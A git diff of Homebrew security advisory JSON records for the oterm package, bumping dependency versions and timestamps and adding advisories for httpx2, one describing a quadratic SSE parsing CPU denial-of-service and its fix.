"BREW-oterm-CVE-2026-48710", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-29T09:29:37Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-86qp-5c8j-p5mr", "CVE-2026-48710", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.0.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -47,16 +47,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-oterm-CVE-2026-48782.json b/advisories/BREW-oterm-CVE-2026-48782.json index 256f7f3b21c..45520b15a99 100644 --- a/advisories/BREW-oterm-CVE-2026-48782.json +++ b/advisories/BREW-oterm-CVE-2026-48782.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-48782", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-cg7w-rg45-pc59", "CVE-2026-48782", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.0.0b3", "resource": "pydantic-ai-slim", - "resource_purl": "pkg:pypi/pydantic-ai-slim@2.17.0" + "resource_purl": "pkg:pypi/pydantic-ai-slim@2.37.0" } } ], @@ -47,16 +47,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pydantic-ai-slim", - "subject_version": "2.17.0", - "key": "pkg:pypi/pydantic-ai-slim@2.17.0", - "resource": "pydantic-ai-slim" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pydantic-ai-slim", - "subject_version": "2.17.0", - "key": "pkg:pypi/pydantic-ai-slim@2.17.0", + "subject_version": "2.37.0", + "key": "pkg:pypi/pydantic-ai-slim@2.37.0", "resource": "pydantic-ai-slim" } ] diff --git a/advisories/BREW-oterm-CVE-2026-48817.json b/advisories/BREW-oterm-CVE-2026-48817.json index 51381072422..9f5f7cb6c73 100644 --- a/advisories/BREW-oterm-CVE-2026-48817.json +++ b/advisories/BREW-oterm-CVE-2026-48817.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-48817", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-x746-7m8f-x49c", "CVE-2026-48817", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.1.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-oterm-CVE-2026-48818.json b/advisories/BREW-oterm-CVE-2026-48818.json index 45aa3e5ae03..6354938eacc 100644 --- a/advisories/BREW-oterm-CVE-2026-48818.json +++ b/advisories/BREW-oterm-CVE-2026-48818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-48818", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-wqp7-x3pw-xc5r", "CVE-2026-48818", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.1.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-oterm-CVE-2026-48990.json b/advisories/BREW-oterm-CVE-2026-48990.json index 8fca632830c..7d17d8bb523 100644 --- a/advisories/BREW-oterm-CVE-2026-48990.json +++ b/advisories/BREW-oterm-CVE-2026-48990.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-48990", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-wphv-vfrh-23q5", "CVE-2026-48990", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.7", "resource": "joserfc", - "resource_purl": "pkg:pypi/joserfc@1.7.4" + "resource_purl": "pkg:pypi/joserfc@1.7.5" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "joserfc", - "subject_version": "1.7.4", - "key": "pkg:pypi/joserfc@1.7.4", - "resource": "joserfc" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.4", - "key": "pkg:pypi/joserfc@1.7.4", + "subject_version": "1.7.5", + "key": "pkg:pypi/joserfc@1.7.5", "resource": "joserfc" } ] diff --git a/advisories/BREW-oterm-CVE-2026-49476.json b/advisories/BREW-oterm-CVE-2026-49476.json index 5dbfbee07c5..3f082869163 100644 --- a/advisories/BREW-oterm-CVE-2026-49476.json +++ b/advisories/BREW-oterm-CVE-2026-49476.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-49476", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-2wc2-fm75-p42x", "CVE-2026-49476", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.8.4", "resource": "soupsieve", - "resource_purl": "pkg:pypi/soupsieve@2.9.1" + "resource_purl": "pkg:pypi/soupsieve@2.9.2" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "soupsieve", - "subject_version": "2.9.1", - "key": "pkg:pypi/soupsieve@2.9.1", - "resource": "soupsieve" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "soupsieve", - "subject_version": "2.9.1", - "key": "pkg:pypi/soupsieve@2.9.1", + "subject_version": "2.9.2", + "key": "pkg:pypi/soupsieve@2.9.2", "resource": "soupsieve" } ] diff --git a/advisories/BREW-oterm-CVE-2026-49477.json b/advisories/BREW-oterm-CVE-2026-49477.json index 3f3e3998894..f4e38cfe593 100644 --- a/advisories/BREW-oterm-CVE-2026-49477.json +++ b/advisories/BREW-oterm-CVE-2026-49477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-49477", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-836r-79rf-4m37", "CVE-2026-49477", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.8.4", "resource": "soupsieve", - "resource_purl": "pkg:pypi/soupsieve@2.9.1" + "resource_purl": "pkg:pypi/soupsieve@2.9.2" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "soupsieve", - "subject_version": "2.9.1", - "key": "pkg:pypi/soupsieve@2.9.1", - "resource": "soupsieve" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "soupsieve", - "subject_version": "2.9.1", - "key": "pkg:pypi/soupsieve@2.9.1", + "subject_version": "2.9.2", + "key": "pkg:pypi/soupsieve@2.9.2", "resource": "soupsieve" } ] diff --git a/advisories/BREW-oterm-CVE-2026-49852.json b/advisories/BREW-oterm-CVE-2026-49852.json index 30b6143ccfb..1aab729015e 100644 --- a/advisories/BREW-oterm-CVE-2026-49852.json +++ b/advisories/BREW-oterm-CVE-2026-49852.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-49852", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-gg9x-qcx2-xmrh", "CVE-2026-49852", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.8", "resource": "joserfc", - "resource_purl": "pkg:pypi/joserfc@1.7.4" + "resource_purl": "pkg:pypi/joserfc@1.7.5" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "joserfc", - "subject_version": "1.7.4", - "key": "pkg:pypi/joserfc@1.7.4", - "resource": "joserfc" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.4", - "key": "pkg:pypi/joserfc@1.7.4", + "subject_version": "1.7.5", + "key": "pkg:pypi/joserfc@1.7.5", "resource": "joserfc" } ] diff --git a/advisories/BREW-oterm-CVE-2026-52869.json b/advisories/BREW-oterm-CVE-2026-52869.json index 8565aa5a972..9e0fe125db5 100644 --- a/advisories/BREW-oterm-CVE-2026-52869.json +++ b/advisories/BREW-oterm-CVE-2026-52869.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-52869", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-jpw9-pfvf-9f58", "CVE-2026-52869", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.27.2", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@1.29.0" + "resource_purl": "pkg:pypi/mcp@2.1.1" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", + "subject_version": "2.1.1", + "key": "pkg:pypi/mcp@2.1.1", "resource": "mcp" } ] diff --git a/advisories/BREW-oterm-CVE-2026-52870.json b/advisories/BREW-oterm-CVE-2026-52870.json index f39d0267218..42760297b86 100644 --- a/advisories/BREW-oterm-CVE-2026-52870.json +++ b/advisories/BREW-oterm-CVE-2026-52870.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-52870", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-hvrp-rf83-w775", "CVE-2026-52870", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.27.2", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@1.29.0" + "resource_purl": "pkg:pypi/mcp@2.1.1" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", + "subject_version": "2.1.1", + "key": "pkg:pypi/mcp@2.1.1", "resource": "mcp" } ] diff --git a/advisories/BREW-oterm-CVE-2026-53537.json b/advisories/BREW-oterm-CVE-2026-53537.json index e0954238696..21cb8fc5b66 100644 --- a/advisories/BREW-oterm-CVE-2026-53537.json +++ b/advisories/BREW-oterm-CVE-2026-53537.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-53537", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-vffw-93wf-4j4q", "CVE-2026-53537", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-53538.json b/advisories/BREW-oterm-CVE-2026-53538.json index 2ff6ae65d33..c1b309298e8 100644 --- a/advisories/BREW-oterm-CVE-2026-53538.json +++ b/advisories/BREW-oterm-CVE-2026-53538.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-53538", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-6jv3-5f52-599m", "CVE-2026-53538", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-53539.json b/advisories/BREW-oterm-CVE-2026-53539.json index 6da4609c27c..33918d28725 100644 --- a/advisories/BREW-oterm-CVE-2026-53539.json +++ b/advisories/BREW-oterm-CVE-2026-53539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-53539", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-5rvq-cxj2-64vf", "CVE-2026-53539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-53540.json b/advisories/BREW-oterm-CVE-2026-53540.json index b17fabf03b4..bc396e8f27d 100644 --- a/advisories/BREW-oterm-CVE-2026-53540.json +++ b/advisories/BREW-oterm-CVE-2026-53540.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-53540", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-v9pg-7xvm-68hf", "CVE-2026-53540", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-54249.json b/advisories/BREW-oterm-CVE-2026-54249.json index 054df16be1d..e1249345497 100644 --- a/advisories/BREW-oterm-CVE-2026-54249.json +++ b/advisories/BREW-oterm-CVE-2026-54249.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-54249", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-20T09:30:09Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-h7p7-w5gc-xj3w", "CVE-2026-54249", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.0.0b6", "resource": "pydantic-ai-slim", - "resource_purl": "pkg:pypi/pydantic-ai-slim@2.17.0" + "resource_purl": "pkg:pypi/pydantic-ai-slim@2.37.0" } } ], @@ -47,16 +47,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pydantic-ai-slim", - "subject_version": "2.17.0", - "key": "pkg:pypi/pydantic-ai-slim@2.17.0", - "resource": "pydantic-ai-slim" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pydantic-ai-slim", - "subject_version": "2.17.0", - "key": "pkg:pypi/pydantic-ai-slim@2.17.0", + "subject_version": "2.37.0", + "key": "pkg:pypi/pydantic-ai-slim@2.37.0", "resource": "pydantic-ai-slim" } ] diff --git a/advisories/BREW-oterm-CVE-2026-54282.json b/advisories/BREW-oterm-CVE-2026-54282.json index 509c859da56..13bc5ba53ab 100644 --- a/advisories/BREW-oterm-CVE-2026-54282.json +++ b/advisories/BREW-oterm-CVE-2026-54282.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-54282", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-jp82-jpqv-5vv3", "CVE-2026-54282", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.3.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-oterm-CVE-2026-54283.json b/advisories/BREW-oterm-CVE-2026-54283.json index 35539351edf..6cfa5175a4c 100644 --- a/advisories/BREW-oterm-CVE-2026-54283.json +++ b/advisories/BREW-oterm-CVE-2026-54283.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-54283", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-82w8-qh3p-5jfq", "CVE-2026-54283", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.3.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-oterm-CVE-2026-58203.json b/advisories/BREW-oterm-CVE-2026-58203.json index 5dc653b9228..0c4ffc03b49 100644 --- a/advisories/BREW-oterm-CVE-2026-58203.json +++ b/advisories/BREW-oterm-CVE-2026-58203.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-58203", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-4xgf-cpjx-pc3j", "CVE-2026-58203" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.14.2", "resource": "pydantic-settings", - "resource_purl": "pkg:pypi/pydantic-settings@2.14.2" + "resource_purl": "pkg:pypi/pydantic-settings@2.15.0" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pydantic-settings", - "subject_version": "2.14.2", - "key": "pkg:pypi/pydantic-settings@2.14.2", + "subject_version": "2.15.0", + "key": "pkg:pypi/pydantic-settings@2.15.0", "resource": "pydantic-settings" } ] diff --git a/advisories/BREW-oterm-CVE-2026-59884.json b/advisories/BREW-oterm-CVE-2026-59884.json index 7db165c791c..795f452f85e 100644 --- a/advisories/BREW-oterm-CVE-2026-59884.json +++ b/advisories/BREW-oterm-CVE-2026-59884.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-59884", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-m4p7-r5rc-7g4j", "CVE-2026-59884", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-59885.json b/advisories/BREW-oterm-CVE-2026-59885.json index 9334770d68d..192bb48a6ff 100644 --- a/advisories/BREW-oterm-CVE-2026-59885.json +++ b/advisories/BREW-oterm-CVE-2026-59885.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-59885", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-8ppf-4f7h-5ppj", "CVE-2026-59885", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-59886.json b/advisories/BREW-oterm-CVE-2026-59886.json index f277486a636..b96f020b7cc 100644 --- a/advisories/BREW-oterm-CVE-2026-59886.json +++ b/advisories/BREW-oterm-CVE-2026-59886.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-59886", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-hm4w-wwcw-mr6r", "CVE-2026-59886", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-59950.json b/advisories/BREW-oterm-CVE-2026-59950.json index d596e5be3ed..d24bacacc3d 100644 --- a/advisories/BREW-oterm-CVE-2026-59950.json +++ b/advisories/BREW-oterm-CVE-2026-59950.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-59950", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-vj7q-gjh5-988w", "CVE-2026-59950", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.28.1", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@1.29.0" + "resource_purl": "pkg:pypi/mcp@2.1.1" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", + "subject_version": "2.1.1", + "key": "pkg:pypi/mcp@2.1.1", "resource": "mcp" } ] diff --git a/advisories/BREW-oterm-CVE-2026-7246.json b/advisories/BREW-oterm-CVE-2026-7246.json index 716f7a4ad8a..741b716dc65 100644 --- a/advisories/BREW-oterm-CVE-2026-7246.json +++ b/advisories/BREW-oterm-CVE-2026-7246.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-7246", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "PYSEC-2026-2132", "CVE-2026-7246", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "8.3.3", "resource": "click", - "resource_purl": "pkg:pypi/click@8.4.2" + "resource_purl": "pkg:pypi/click@8.5.0" } } ], @@ -46,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "click", - "subject_version": "8.4.2", - "key": "pkg:pypi/click@8.4.2", + "subject_version": "8.5.0", + "key": "pkg:pypi/click@8.5.0", "resource": "click" } ] diff --git a/advisories/BREW-oterm-CVE-2026-84378.json b/advisories/BREW-oterm-CVE-2026-84378.json new file mode 100644 index 00000000000..3d68bb0cc5d --- /dev/null +++ b/advisories/BREW-oterm-CVE-2026-84378.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-oterm-CVE-2026-84378", + "published": "2026-09-10T20:19:30Z", + "modified": "2026-09-10T20:19:30Z", + "upstream": [ + "GHSA-f2fp-rgf2-35cp", + "CVE-2026-84378", + "PYSEC-2026-3847" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "oterm", + "purl": "pkg:brew/oterm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.20.0" + }, + { + "fixed": "0.24.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Quadratic SSE line buffering can cause CPU denial of service", + "details": "### Summary\n\nHTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.\n\n### Details\n\nBefore version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.\n\nThe behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.\n\n### Impact\n\nApplications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.\n\n### Mitigation\n\nUpgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.\n\nIf upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-f2fp-rgf2-35cp" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84378" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1071" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1117" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/cbfc0e04ef6507da29ccbb3b9c2e5b23dd693414" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-oterm-CVE-2026-84379.json b/advisories/BREW-oterm-CVE-2026-84379.json new file mode 100644 index 00000000000..2cea5f7e11c --- /dev/null +++ b/advisories/BREW-oterm-CVE-2026-84379.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-oterm-CVE-2026-84379", + "published": "2026-09-10T20:19:31Z", + "modified": "2026-09-10T20:19:31Z", + "upstream": [ + "GHSA-h4x7-gw46-3wm6", + "CVE-2026-84379", + "PYSEC-2026-3848" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "oterm", + "purl": "pkg:brew/oterm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.19.0" + }, + { + "fixed": "0.24.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, 